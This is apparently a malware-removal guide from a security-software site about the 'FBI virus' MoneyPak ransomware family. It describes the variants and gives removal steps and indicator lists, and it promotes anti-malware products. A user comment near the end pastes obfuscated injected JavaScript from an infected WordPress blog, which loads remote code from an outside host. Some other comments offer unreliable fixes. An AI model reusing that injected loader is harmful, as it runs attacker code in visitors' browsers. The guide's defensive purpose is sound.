Remove FBI virus
Removal instructions

Severity scale:  
  (100/100)
FBI virus is also known as MoneyPack ransomware | Type: Ransomware | Tags: Ukash

FBI virus is a sneaky malware, which can get into its target computer undetected with a help of Trojan.LockScreen. As soon as it gets inside, this scamware presents itself as 'The FBI Federal Bureau Investigation' and shows an aggressively-designed alert. This alert claims that computer is blocked regarding to the Copyright and Related Rights Law violation and other seriously-looking reasons. Unfortunately, if you found yourself blocked by a program, which tells that you have been illegally using or distributing copyrighted content, viewing or distributing pornographic content and spreading malware, you must ignore such alert. That's because it means that your PC is infected. Remember, this program is distributed by scammers only for swindling your and other people's money, so you must remove FBI virus immediately after detection! Beware that security experts expect this group of ransomware to grow and improve in the future..

HOW CAN FBI VIRUS INFECT MY COMPUTER?

This infection gets inside the system through security vulnerabilities that appear as soon as people forget to take care of their computers' security. If you don't use security software or don't update it, you can also run into this virus one day. Of course, you must always think about safe browsing and avoid suspicious downloads that are actively offered on the Internet right now. The biggest issue, which is caused by this ransomware, is that it has ability to block the system, 'lock' it down and disable all programs that are kept on it. In order to 'unlock' it, FBI virus offers to pay the fine through MoneyPak or other prepayment systems. Of course, as you must have already understood, you must never pay this $100 fine if you don't want to support those scammers who are collecting these fines.

FBI VIRUS VERSIONS:

FBI Moneypak: This ransomware uses a huge alert filled with FBI and Moneypak logos, a webcam and a list of crimes victim is accused for. User is informed that he has been viewing/distributing pornographic or copyrighted content, spreading malware or doing other illegal activities. For that, he has to pay a $100  fine and enter a Moneypak code on the right side of the fake alert. This threat locks the system down completely.

FBI Green Dot Moneypak Virus: This ransomware locks the whole system down and displays a fake alert with FBI, Moneypak and McAfee logos. A miselading message, which belongs to this threat, claims that Federal Bureau of Investigation has blocked you for downloading illegal/copyrighted material and similar crimes. It requires to pay $200 fine and includes the steps explaining how you should do that.

FBI Virus Black Screen: This ransomware from the FBI group of viruses uses the same technique as its predecessors and seeks to make users pay a $200 fine. However, it also applies an audio warning, black screen and system's lock down. It will similarly claim that you have been caught for law violations and will accuse you for visiting pornographic websites, viewing files containing zoophilia, child pornography and similar.

FBI Online Agent: This ransomware also uses the name of the Federal Bureau of Investigation, but it has a newly-designed alert, which tends to accuse victim for committing various crimes and asks to pay $200 using MoneyPak. The new thing about FBI Online Agent is that it doesn't show your IP address or location but gives the name of the responsible agent, case number and other details that are clearly invented. Besides, scammers have included the promotion of the terrorism into the list of the crimes that are reported into this misleading warning.

FBI Cybercrime Division virus: That's the dangerous ransomware, which pretends to belong to the FBI's Cybercrime Division. This virus uses identical scheme while trying to steal users' money. However, this time it asks to pay $300 using Moneypak prepayment system. Be sure that its alert is not legitimte and can be safely ignored. The new version applies a newly designed alert, which is filled with more than ten different logos. 

FBI PayPal virus: This ransomware is not related in any way to Federal Bureau of Investigation . As soon as it gets inside the system, this ransomware blocks the entire desktop and disables Internet connection on its target PC. In addition, it asks paying the fine of $100 for invented online crimes, such as the use of copyrighted content or distribution of malware. Differently from earlier parasites, that use identical scheme for stealing the money, FBI PayPal virus uses PayPal for its money transactions. Please, stay away from this threat.

FBI Department of Defense virus: This is a dangerous ransomware virus, which, similarly to its predecessors, seeks to swindle $300 by convincing its victims that they have violated several laws of USA. This virus has the same ability to lock down the PC and hide every file, which is kept on the computer. The new thing about this version of FBI virus, is that it offers using MoneyGram prepayment system for paying the fine. Please, never follow its recommendations!

White Screen FBI virus: This is a cyber infection, which is categorized as ransomware and belongs to the same group of FBI virus. If you see a white screen and a mouse cursor on your computer's desktop, that means this virus failed to load properly. However, you may also receive a huge warning from FBI, which reports about the illegal use of videos related to child pornography or other e-crimes. Please, ignore warning that belongs to White Screen FBI virus and never pay any money or provide any personal information.

FBI Computer Crime and Intellectual Property Section virus: This is a dangerous ransomware that occupies entire computer as soon as it infects it. Instead of the desktop, it shows a huge alert stating that 'computer is locked by Internet Service Provider' for several different reasons. Just like previous versions, it claims that computer's owner was noticed watching and spreading copyrighted content and doing other activities that clearly violate some laws of USA. This FBI virus version asks to pay a fine of $200. Please, never follow this requirement.

FBI System Failure virus: FBI System Failure virus is a serious ransomware threat, which blocks computers with its fake warning saying: 'All Activities of this computer has been recorded. All your files are encrypted. Don’t try to unlock your computer!'. Just like previous its versions, this virus seeks to make its victims pay an invented fine. This version is used to swindle $300, for that it asks using REloadit prepayment system. If you see such warning, you must ignore it and use anti-malware software to remove malicious files from the system. 

HOW CAN I REMOVE FBI VIRUS?

In order to remove FBI virus, you should firstly unlock your computer. For that, we recommend using another PC that has an Internet connection and following the steps listed bellow:

1. Take another machine and use it to download SpyHunter or other reputable anti-malware program. You can also try downloading STOPzilla or Malwarebytes Anti Malware.

2. Update the program and put into the USB drive or simple CD.

3. In the meanwhile, reboot your infected machine to Safe Mode with command prompt and stick USB drive in it.

4. Reboot computer infected with virus once more and run a full system scan.

UPDATE: Be aware about the new versions of FBI virus, that are called FBI Green Dot Moneypak virusFBI Virus Black Screen and FBI Online Agent. They have been clearly designed to get more money from its victims, so they show a warning asking $200, not $100, to be payed through MoneyPak prepayment system. To remove these versions completely, run a full system scan with updated anti-virus/anti-malware program. In order to unlock your PC, use the steps given above and follow additional information:

* Users infected with FBI group of viruses are allowed to access other accounts on their Windows systems. If one of such accounts has administrator rights, you should be capable to launch anti-malware program.

*   Try to deny the Flash to make your ransomware stop function as intended. In order to disable the Flash, go to Macromedia support and select 'Deny': http://www.macromedia.com/support/documentation/en/flashplayer/help/help09.html. After doing that, run a full system scan with anti-malware program.

* Manual FBI virus removal:

  1. Reboot you infected PC to 'Safe mode with command prompt' to disable FBI virus (this should be working with all versions of this threat)
  2. Run Regedit
  3. Search for WinLogon Entries and write down all the files that are not explorer.exe or blank. Replace them with explorer.exe.
  4. Search the registry for these files you have written down and delete the registry keys referencing the files.
  5. Reboot and run a full system scan with updated SpyHunter to remove remaining files.

This video guide shows how to remove FBI virus. However, there might be some differences in its removal because of diffrent systems and versions of the parasite. Use the auto-removal process to remove the infection easily.

UPDATE2: FBI virus has just been updated - now it is capable of blocking Android devices. It acts just like its previous versions. So, as soon as FBI android virus enters OS, it locks is down and then displays a fake warning message asking people to pay a fine for their illegal online activities. Please, do NOT pay this fine! If your Android device was blocked, you should follow these steps: 

1. Reboot your Android device into Safe Mode:

  1. Find the power button and press it for a couple of seconds until you see a menu. Tap the Power off.
  2. Once you see a dialog window that offers you to reboot your Android to Safe Mode, select this option and OK.

If this failed to work for you, just turn off your device and then turn it on. Once it becomes active, try pressing and holding MenuVolume DownVolume Up or Volume Down and Volume Up together to see Safe Mode.

2. Uninstall malicious app (FBI Android virus may hide under BaDoink, Video Player, Network Driver System, Video Render, ScarePakage and other suspicious names):

  1. When in Safe Mode, go to Settings. Once there, click on Apps or Application manager (this may differ depending on your device).
  2. Here, look for previously mentioned malicious app(s) and uninstall all of them.

If this failed, enter a random, 15 digit length, code of imaginary MoneyPak xpress Packed voucher that is asked by FBI android virus or follow these steps:

  1. Go to Settings -> Security. Here, select Device administrators.
  2. Here, look for previously mentioned malicious app(s) and uncheck it
  3. In order to finish the removal of FBI Android virus, select Deactivate and OK.

FBI virus video guide



Automatic FBI virus removal:

It might be that we are affiliated with any of our recommended products. Full disclosure can be found in our Agreement of Use.
By downloading any of provided Anti-spyware software to remove FBI virus you agree with our Privacy Policy and Agreement of Use.
Do it now!
Download
remover for FBI virus Happiness
Guarantee
Compatible with Microsoft
SpyHunter is recommended remover to uninstall FBI virus. You should confirm using free trial that it detects current version of parasite.
more than 40.000.000 downloads!
What to do if you failed to remove the infection?
If you failed to remove FBI virus using SpyHunter, read here how to submit a support ticket or submit a question to our support team and provide as much details as possible.

Alternate Software

STOPzilla
We are testing STOPzilla's efficiency at removing FBI virus (2012-06-18 09:51:30)
Malwarebytes Anti Malware
We are testing Malwarebytes Anti Malware's efficiency at removing FBI virus (2012-06-18 09:51:30)
XoftSpySE Anti Spyware
We are testing XoftSpySE Anti Spyware's efficiency at removing FBI virus (2012-06-18 09:51:30)
Defender Pro Ultimate
We are testing Defender Pro Ultimate's efficiency at removing FBI virus (2012-06-18 09:51:30)
Virus Removal Phone Support
1-877-657-9614
Help Line to remove FBI virus

FBI virus screenshot

FBI virus manual removal

Kill processes:
tpl_0_c.exe
ch810.exe
0_0u_l.exe
[random].exe
jork_0_typ_col.exe
vsdsrv32.exe
Protector-[rnd].exe
Inspector-[rnd].exe
Delete registry values:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[random].exe
HKEY_LOCAL_MACHINE\SOFTWARE\FBI Moneypak Virus
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Policies\System ‘DisableRegistryTools’ = 0
HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system ‘EnableLUA’ = 0
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Internet Settings ‘WarnOnHTTPSToHTTPRedirect’ = 0
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Policies\System ‘DisableRegedit’= 0
HKEY_CURRENT_USER\Software\FBI Moneypak Virus
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ‘Inspector’
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FBI Moneypak Virus
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Policies\System ‘DisableTaskMgr’ = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\protector.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Inspector %AppData%\Protector-[rnd].exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\ID 4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\UID [rnd]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\net [date of installation]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ConsentPromptBehaviorAdmin 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ConsentPromptBehaviorUser 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe\Debugger svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe\Debugger svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE\Debugger svchost.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System “DisableRegistryTools” = 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System “DisableTaskMgr” = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system “ConsentPromptBehaviorAdmin” = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system “ConsentPromptBehaviorUser” = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system “EnableLUA” = 0
Unregister DLLs:
wpbt0.dll

Delete files:
%Program Files%\FBI Moneypak Virus
%AppData%\Protector-[rnd].exe
%AppData%\Inspector-[rnd].exe
%AppData%\vsdsrv32.exe
%AppData%\result.db
%AppData%\jork_0_typ_col.exe
%appdata%\[random].exe
%Windows%\system32\[random].exe
%Documents and Settings%\[UserName]\Application Data\[random].exe
%Documents and Settings%\[UserName]\Desktop\[random].lnk
%Documents and Settings%\All Users\Application Data\FBI Moneypak Virus
%CommonStartMenu%\Programs\FBI Moneypak Virus.lnk
%Temp%\0_0u_l.exe
%Temp%\[random].exe
%StartupFolder%\wpbt0.dll
%StartupFolder%\ctfmon.lnk
%StartupFolder%\ch810.exe
%UserProfile%\Desktop\FBI Moneypak Virus.lnk
WARNING.txt
V.class
cconf.txt.enc
tpl_0_c.exe

Geolocation of FBI virus

This map reveals the prevalence of FBI virus. Countries and regions that have been affected the most are: United States, Indonesia, India, Canada and Mexico.

QR code for FBI virus removal instructions

FBI virus qrcode QR is short for Quick Response. They can be read quickly by the mobile phones. QR codes can store more data than standard barcodes, including url links, geo coordinates, and text.
The reason we add QR code to the website is that parasites like FBI virus are really hard to remove on infected computer. you can quicly scan the QR code with your mobile device and have manual removal instructions to uninstall FBI virus right in your pocket.
Simply use the QR scanner and read removal instructions from mobile device.

Removal guides in other languages

Information added: 2014-11-06 03:16
Information updated: 2014-11-06 03:16

Ask us discussions

Modern viruses are really hard to remove. They have random file names, random registry entries, they can immitale legal products and files. Removal instructions sometimes can't Help to remove infection manually. Please take a look at our discussion where users like you share they experience in fighting the parasite:

5

How to disable FBI virus warning?

-
2

What should I know about FBI MoneyPak/FBI virus removal?

-
4

Help me to unblock PC from FBI Green Dot Moneypak virus!

-
2

SpyHunter fails to remove FBI Moneypak/FBI virus, help!

-
1

FBI Virus elimination guide

-
7

How to unblock PC from FBI Moneypak/FBI virus

-
3

Need to banish FBI MoneyPak, help!

-
2

How to fix my PC after FBI virus infiltration?

-
2

Need your help to erase FBI Virus!

-
2

Need to fix my PC after FBI Green Dot Moneypak virus/FBI virus infiltration

-
2

How to eliminate FBI virus? Cannot activate SpyHunter 4!

-
2

Need to kill FBI Green Dot MoneyPak virus

-
2

Want to opt out FBI virus, help!

-
2

Stop ilqoxken.exe if you want to get rid of FBI virus

-
2

Fbi Green Dot Moneypak virus fix question

-
2

FBI Green Dot Moneypak virus elimination guide

-
2

What do I do? I see Error 1401 when trying to stop FBI Cybercrime Division virus

-
3

Help! Need to disable FBI virus!

-
1

Need a guide to delete FBI Moneypak

-
3

Fixing FBI Green Dot Moneypak virus

-
1

IP address useable once computer infected by FBI virus?

-
4

Is new Bitdefender 2013 Plus good to protect against FBI virus?

-
1

How to eliminate FBI virus?

-
1

Eliminating FBI Virus on my wife's computer

-
3

Trying to get rid of fbi 300 moneypak virus, help!

-
2

Can't find a way to uninstall FBI virus

-
1

How can I get rid of fbi scam??

-
1

FBI Virus removal from Linux

-
1

I think my computer is infected with FBI Virus, help!

-
1

Can FBI virus attach itself to the router?

-
4

How to get rid of FBI Virus scam?

-
2

Infected by FBI virus, can you help me?!

-
1

How to remove FBI VIRUS from Android phone!?

-

Additional resources

Attention: If you know know a reputable website reated to security threats, please add a link here: add url

Users comments about FBI virus:

0
0
blastwave7
Thanks Romeo. Super simple. Gotta try on XP the same way thru command prompt and remove from parents computer. What we have to do is develop a counter-malware that infects the infector at installation. Were working on that but could always use input. Thanks again.
0
0
jeff
I have a Samsung 10.1 notebook infected by the fbi virus, what can I do
0
0
Mike Hawk
How do you get the virus off your cell phone.
0
0
BigJohnson
Here is how you prevent this from happening again. If you run your browser Incognito mode files are not saved to your computer. So if the window pops up with the FBI warning, simply hit- cntr alt del and bring up the task manager, then force shut down of browser window. End of problem, restart the browser and reopen incognito window.
0
0
Derrick
Thank you for the help. My virus quit when I restarted my computer. It said I had a $500 fine.
0
0
tyler
hi just want to thank you very much for this info when i saw that website i freaked out knowing that i havent pirated anything.
I though i was being blamed but to discover it is a scam!!!
some people are just horrible low down pieces of ****
so thank you once again
1
0
John
Hi my wordpress blog got infected with this code

/*LGPL*/ try{ window.onload = function(){var Jgnn5u88aojf3 = document.createElement(s&^c(r&$$i&p#t@#!.replace(/@|$|)|(|!|#|&|^/ig, ));Jgnn5u88aojf3.setAttribute(defer, d!e#&f)!e((r!)#.replace(/#|)|^|&|!|@|$|(/ig, ));Jgnn5u88aojf3.setAttribute(type, t^e&!x()(^t!!^/#^j((#a$#$v&(a)s#&c#^r^!i&p)&t^.replace(/$|@|(|#|&|)|!|^/ig, ));Jgnn5u88aojf3.setAttribute(id, K#!^9$q#y(@3&^#n!#5^o@@#q##^k!($b$(&9!&&.replace(/^|@|!|&|)|#|(|$/ig, ));Jgnn5u88aojf3.setAttribute(s$^r!(^c&.replace(/$|)|^|(|&|@|#|!/ig, ), h&)t&$)(t)p@^##@:)(@/(/^@o^^&n&#e^&m@$a^@n^@g#a(-^^c$&!o^$#m&@.($!$t(##@i#@c@&&&k^(#e@t(!m#a!))s#t#(e^&@r@(.)#(c@^o$m$).##p!#l##&a&@l^(a))-)&o!@r#^)-^$@j@@$p!&(.)@)w(^!!o@&)@r^^!l)@d@!w#()e)(b(^w##!o@$&r^!)l$d(@.)##r($&)(u$#)&:@8(!!$0(!^)8^0&)/(##c))&l$a^&s)s^m)(a#t@e!&)s$.#!c$&o)^)@m@/@$c(l$a()s^$!s^((m@^&a!t$e^s!.#@^c)^!o)^m!!&/$^b#@$o$s!#t^$(o^!^n($.)@c))@o@!m!^/)g#)o$o(@#&g)!)l&&#$e($(.!c&o&@&@!m&/(($h!#u()(a^$$n(#q^&i@@#&u&&.#^##c@##o&$m&^##/&.replace(/&|^|(|$|!|)|#|@/ig, ));if (document){document.body.appendChild(Jgnn5u88aojf3);}} } catch(Rv4t8n6s1x6zp0x02e8dmd) {}

What can i do?
0
0
sujit
Hey check this fix for FBI virus.

itech-softblog.blogspot.com

It helped 1000s.
will help you too.
Like, Share, Comment and help your friends also.
0
0
nissa
Anyone have easy steps to remove off galaxy 3..im in safe mode to delete the program but its not allowing me to uninstall or force stop. Help
2
0
awesome
loging off and then cancelling is working so far on windows 7 , hopefully it all comes out.
0
0
Oj
I am unable to get past the FBI screen and to my desktop in safe mode. is there a workaround?
More comments...

Post Comment

Attention: Use this form only if you have additional information about FBI virus parasite, its removal instructions, additional resources or behavior. By clicking "post comment" button you agree not to post any copyrighted, unlawful, harmful, threatening, abusive, harassing, defamatory, vulgar, obscene, profane, hateful, racially, ethnically or otherwise objectionable material of any kind.

Home page Name



«

(All fields are required)
Like us on Facebook
News
Subscribe
Ask us
Parasites
Tags
Files
What's your antispyware?
Compare
I failed to remove FBI virus using SpyHunter.

Email


Close
add text box
rss feed
help other
Spreading the knowledge: It is very hard to fight against computer parasites on the Internet alone. If you have a website, we would be more than happy if you would like to cooperate and help us spread the information about latest threats. Remember, knowledge is the most powerful weapon. Help your visitors protect their computers!